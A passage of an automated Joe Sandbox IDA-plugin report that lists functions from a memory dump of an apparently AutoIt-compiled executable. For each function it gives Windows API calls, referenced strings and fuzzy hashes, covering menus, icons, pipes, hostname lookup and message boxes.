Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 079a100efde40880d39c9a20bd3cc73c31963b6372b92e0dbec9164075a64906
Instruction ID: 79d69c2d74c1bdedbd39123c96536ad8c164a59cdbec2dda9de96914e135b95f
Opcode Fuzzy Hash: 079a100efde40880d39c9a20bd3cc73c31963b6372b92e0dbec9164075a64906
Instruction Fuzzy Hash: 7851CE70A0420DABDB21DF6CCA88ABEBFF5BF44314F145539E611EB2A1D7789944CB21

Uniqueness

Uniqueness Score: -1.00%

Function 005FD034 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 005FD0D3

Strings

stop, xrefs: 005FD0A4
question, xrefs: 005FD08C
warning, xrefs: 005FD0BC
info, xrefs: 005FD074
blank, xrefs: 005FD055

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 6c267b36e8ebf9f2c30a1caecbee2c0c835bba38ca22f7af8cec3f0a1870f100
Instruction ID: cf9823c2af9b8a9003f7acb24f8cd601e5c62f262c0be5ca886966b6659696ab
Opcode Fuzzy Hash: 6c267b36e8ebf9f2c30a1caecbee2c0c835bba38ca22f7af8cec3f0a1870f100
Instruction Fuzzy Hash: 0A11DB3534870BBEE7205714AC8ACFA6FFDFF19310F60001AFA0066282FE69AD054574

Uniqueness

Uniqueness Score: -1.00%

Function 005FE653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 005FE66E
gethostname.WSOCK32(?,00000100), ref: 005FE688
gethostbyname.WSOCK32(?), ref: 005FE695
inet_ntoa.WSOCK32(?), ref: 005FE6D7
_strcat.LIBCMT ref: 005FE6E5
WSACleanup.WSOCK32 ref: 005FE70A

Strings

0.0.0.0, xrefs: 005FE6B3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 190e93429b6f2750c489a9d6cbeefcba9dd4e7d4e248b389a02cd47429fe5bc1
Instruction ID: 7ae535c159cb88c9172a304968be9e9a29b437ec578ede0321d659b6d425b8f4
Opcode Fuzzy Hash: 190e93429b6f2750c489a9d6cbeefcba9dd4e7d4e248b389a02cd47429fe5bc1
Instruction Fuzzy Hash: 6011B43190021A6FDB3477649C4FEEE7B7CFF80710F210165F645920A2EF789A819A50

Uniqueness

Uniqueness Score: -1.00%

Function 00614E80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00614FA5
VariantInit.OLEAUT32(?), ref: 006150A6
VariantClear.OLEAUT32(?), ref: 006150B0
VariantClear.OLEAUT32(?), ref: 0061510D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00614F35, 00615063, 0061511B
Incorrect Object type in FOR..IN loop, xrefs: 00615089

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: adc4bdb63693ff2ce5433d7fcb280282f239e5f5743140865af772d9de2306fe
Instruction ID: 583afcfc426adf2ab459da60f4a0d3adbea24fc106ae53ada98a85f105f4a25d
Opcode Fuzzy Hash: adc4bdb63693ff2ce5433d7fcb280282f239e5f5743140865af772d9de2306fe
Instruction Fuzzy Hash: 0D919171A00619EFDF20CFA4C845FDEBBB9EF85715F148159F506AB280D7709986CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 006142A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006142C8
CharUpperBuffW.USER32(?,?), ref: 006143D7
_wcslen.LIBCMT ref: 006143E7
VariantClear.OLEAUT32(?), ref: 0061457C

Part of subcall function 006015B3: VariantInit.OLEAUT32(00000000), ref: 006015F3
Part of subcall function 006015B3: VariantCopy.OLEAUT32(?,?), ref: 006015FC
Part of subcall function 006015B3: VariantClear.OLEAUT32(?), ref: 00601608

Strings

AUTOIT.ERROR, xrefs: 006143DD, 006143E2
Incorrect Parameter format, xrefs: 00614303, 006144FE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 5f632985a8386a037feb95465a1804fbf2173c52a36255bff4116bb9d22554c0
Instruction ID: 1ae1179aa5f01cd012bb6b829d342489e167404a4d730fe6866dcaf943b0543d
Opcode Fuzzy Hash: 5f632985a8386a037feb95465a1804fbf2173c52a36255bff4116bb9d22554c0
Instruction Fuzzy Hash: 5D917C746083029FCB04DF24C5859AABBE6FF89314F18892DF8899B351DB30ED46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00622A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00622AE2
GetMenuItemCount.USER32(00000000), ref: 00622B14
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00622B3C
_wcslen.LIBCMT ref: 00622B72
GetMenuItemID.USER32(?,?), ref: 00622BAC
GetSubMenu.USER32(?,?), ref: 00622BBA

Part of subcall function 005F42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F42E6
Part of subcall function 005F42CC: GetCurrentThreadId.KERNEL32 ref: 005F42ED
Part of subcall function 005F42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F2E43), ref: 005F42F4

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00622C42

Part of subcall function 005FF1A7: Sleep.KERNEL32 ref: 005FF21F

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: c9ed3fd5190051fe1eb0f61ac18102c1a9eaa6b7a0dfc1f25fc031d0ebeaf6ba
Instruction ID: 9bf6b64aed5f6b938e67f7279a8770ae9468c2e4c5f835b30f1ed4b4af0d34c9
Opcode Fuzzy Hash: c9ed3fd5190051fe1eb0f61ac18102c1a9eaa6b7a0dfc1f25fc031d0ebeaf6ba
Instruction Fuzzy Hash: 73718E75A00616AFCB10EF64D855AAEBBF6FF88310F148458E816AB351DB74ED42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 006287FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00628896
IsWindowEnabled.USER32(00000000), ref: 006288A2
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0062897D
SendMessageW.USER32(00000000,000000B0,?,?), ref: 006289B0
IsDlgButtonChecked.USER32(?,00000000), ref: 006289E8
GetWindowLongW.USER32(00000000,000000EC), ref: 00628A0A
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00628A22

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: b4c143d293a9ee08b4f36c73e8a71c0ff19d43fa21397f3fdd8d6da1351bbc86
Instruction ID: c014c14416446d316c36845ad87212e6a2111cadd6cce34daa647f95f1da4837
Opcode Fuzzy Hash: b4c143d293a9ee08b4f36c73e8a71c0ff19d43fa21397f3fdd8d6da1351bbc86
Instruction Fuzzy Hash: 3971BC34A02A25AFEF218F54EC94FFA7BBAEF49300F140459E84597361CB35A991CF11

Uniqueness

Uniqueness Score: -1.00%

Function 005B30B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005B30DB
___except_validate_context_record.LIBVCRUNTIME ref: 005B30E3
_ValidateLocalCookies.LIBCMT ref: 005B3171
__IsNonwritableInCurrentImage.LIBCMT ref: 005B319C
_ValidateLocalCookies.LIBCMT ref: 005B31F1

Strings

csm, xrefs: 005B3186

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 68de633979019d316c1738e9baed0c789ccdb6ed6569a0e18b379d67db0c12df
Instruction ID: 5045ea5504e8d9d4c068bb39dd5d3d853eb36ab39e2e29469e04eb3792eba873
Opcode Fuzzy Hash: 68de633979019d316c1738e9baed0c789ccdb6ed6569a0e18b379d67db0c12df
Instruction Fuzzy Hash: 51414E34A00219ABCB10DF6CC849AEEBFB9BF45364F148555E8157B392D731AB15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005F808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F80D1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F80F7
SysAllocString.OLEAUT32(00000000), ref: 005F80FA
SysAllocString.OLEAUT32 ref: 005F811B
SysFreeString.OLEAUT32 ref: 005F8124
StringFromGUID2.OLE32(?,?,00000028), ref: 005F813E
SysAllocString.OLEAUT32(?), ref: 005F814C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 27f82f676f4ed9327711f417cdd5af03517170699ee0ef743cb1b09de23ba468
Instruction ID: da4f0cbfeae0d81bfc8fc72c39a8b22b03a2c9fb2cbd0d2a23364f14fd8aa278
Opcode Fuzzy Hash: 27f82f676f4ed9327711f417cdd5af03517170699ee0ef743cb1b09de23ba468
Instruction Fuzzy Hash: 69218B712001096FDF10AFA8DC88CBA7BEDFB493607008525FA15CB290DA74EC46CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00600D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00600DAE
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00600DEA

Strings

nul, xrefs: 00600E23

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 93cccf4164a3bf805e39dddaa22bc0981790b158b013260fc23ecc99ae0e4546
Instruction ID: e3dc87b4b9dc5239608cef9d4e6469c70ede499a8e013a2fc08f86d1e3ac7856
Opcode Fuzzy Hash: 93cccf4164a3bf805e39dddaa22bc0981790b158b013260fc23ecc99ae0e4546
Instruction Fuzzy Hash: FE216B74540306EFEB248F69DC04B9BBBA6AF45721F204E19F9A1E72E0D7709951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00600E63 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00600E82
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00600EBD

Strings

nul, xrefs: 00600EF5

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: e8e581aa43c89b2c3c07468c140a7725a039106cee7f16009a36a08e7556fd61
Instruction ID: ebe18f29f152a99a4ff3059c2b9a97ad7321477a5b2697bcd8b061b83c8162ec
Opcode Fuzzy Hash: e8e581aa43c89b2c3c07468c140a7725a039106cee7f16009a36a08e7556fd61
Instruction Fuzzy Hash: 3A217A71544346ABEB349F28DC04B9BB7AAEF55724F200A19FDA1E32E0D7709D41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00624A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00597759
Part of subcall function 0059771B: GetStockObject.GDI32(00000011), ref: 0059776D
Part of subcall function 0059771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00597777

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00624A71
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00624A7E
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00624A89
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00624A98
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00624AA4

Strings

Msctls_Progress32, xrefs: 00624A42

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: dc47c1946e0828c91094e999cfd82f723be17e65a1fd84877f9d7d7fa75cb561
Instruction ID: 852a29fa568159e6d6658e4a166c0c14b719007b04b05f16ad357eca175575e0
Opcode Fuzzy Hash: dc47c1946e0828c91094e999cfd82f723be17e65a1fd84877f9d7d7fa75cb561
Instruction Fuzzy Hash: EE11B6B115011EBEEF118F64DC85EE77FAEEF08798F014111FA14A2150CA719C21DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 005FE223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005FE23D
LoadStringW.USER32(00000000), ref: 005FE244
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005FE25A
LoadStringW.USER32(00000000), ref: 005FE261
MessageBoxW.USER32(00000000,?,?,00011010), ref: 005FE2A5

Strings

%s (%d) : ==> %s: %s %s, xrefs: 005FE282

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 7fe6bc4372b5adca21aab0fae00de7c4c3a9a758616ec932f2980c20b03d2d0b
Instruction ID: 19b70e2270696fe50a5bd8372ae7dab2bc7e6f0966bddebfa8f7c5c07ef6022b
Opcode Fuzzy Hash: 7fe6bc4372b5adca21aab0fae00de7c4c3a9a758616ec932f2980c20b03d2d0b
Instruction Fuzzy Hash: 290186F690020C7FE7109B94DD8DEFB776DE708301F004591B746E2041E6749E858B71

Uniqueness

Uniqueness Score: -1.00%

Function 00601227 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00601237
EnterCriticalSection.KERNEL32(00000000,?), ref: 00601249
TerminateThread.KERNEL32(00000000,000001F6), ref: 00601257
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00601265
CloseHandle.KERNEL32(00000000), ref: 00601274
InterlockedExchange.KERNEL32(?,000001F6), ref: 00601284
LeaveCriticalSection.KERNEL32(00000000), ref: 0060128B

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b95f3b4c5613fd209b30fd8ccf6367f8a62706918f832dc6b9b749ab83116704
Instruction ID: 9ceb9844e07872bdc5b16b4d1fc481883bdaaaec47307500c610061901cb0535
Opcode Fuzzy Hash: b95f3b4c5613fd209b30fd8ccf6367f8a62706918f832dc6b9b749ab83116704
Instruction Fuzzy Hash: 0FF03C32442A12FBD7655B64EE4CBDA7B3AFF01302F502025F202958A0C7749676CF90

Uniqueness

Uniqueness Score: -1.00%

Function 006125BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0061271D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0061273E
WSAGetLastError.WSOCK32 ref: 0061274F
htons.WSOCK32(?,?,?,?,?), ref: 00612838
inet_ntoa.WSOCK32(?), ref: 006127E9

Part of subcall function 005F4277: _strlen.LIBCMT ref: 005F4281

Part of subcall function 00613B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0060F569), ref: 00613B9D

_strlen.LIBCMT ref: 00612892

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 29f751105eb9e5929b3582e82439726855de6930559bf23272200913d98e04d6
Instruction ID: ccb61fd44674f87e6b4ca6e9cd18ef7d0f3c9b3ee6e3675937d11d810849c8e5
Opcode Fuzzy Hash: 29f751105eb9e5929b3582e82439726855de6930559bf23272200913d98e04d6
Instruction Fuzzy Hash: 41B1E575204302AFD714DF24C8A9EAA7BA6BF84314F58854CF4564B3E2DB31ED86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005C0547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 005C044A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C0466
__allrem.LIBCMT ref: 005C047D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C049B
__allrem.LIBCMT ref: 005C04B2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C04D0

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
Instruction ID: 73e16c9238c003f2106793022ab460b984de0068c65bdd19e1ca5acfe12248f6
Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
Instruction Fuzzy Hash: 3B81D572600706DFEB249EADCC86F6B7BA8BF90764F24552EF611D62C1E770D9018B50

Uniqueness

Uniqueness Score: -1.00%

Function 005C658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005B8669,005B8669,?,?,?,005C67DF,00000001,00000001,8BE85006), ref: 005C65E8
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005C67DF,00000001,00000001,8BE85006,?,?,?), ref: 005C666E
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005C6768
__freea.LIBCMT ref: 005C6775

Part of subcall function 005C3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,005B6A99,?,0000015D,?,?,?,?,005B85D0,000000FF,00000000,?,?), ref: 005C3BE2

__freea.LIBCMT ref: 005C677E
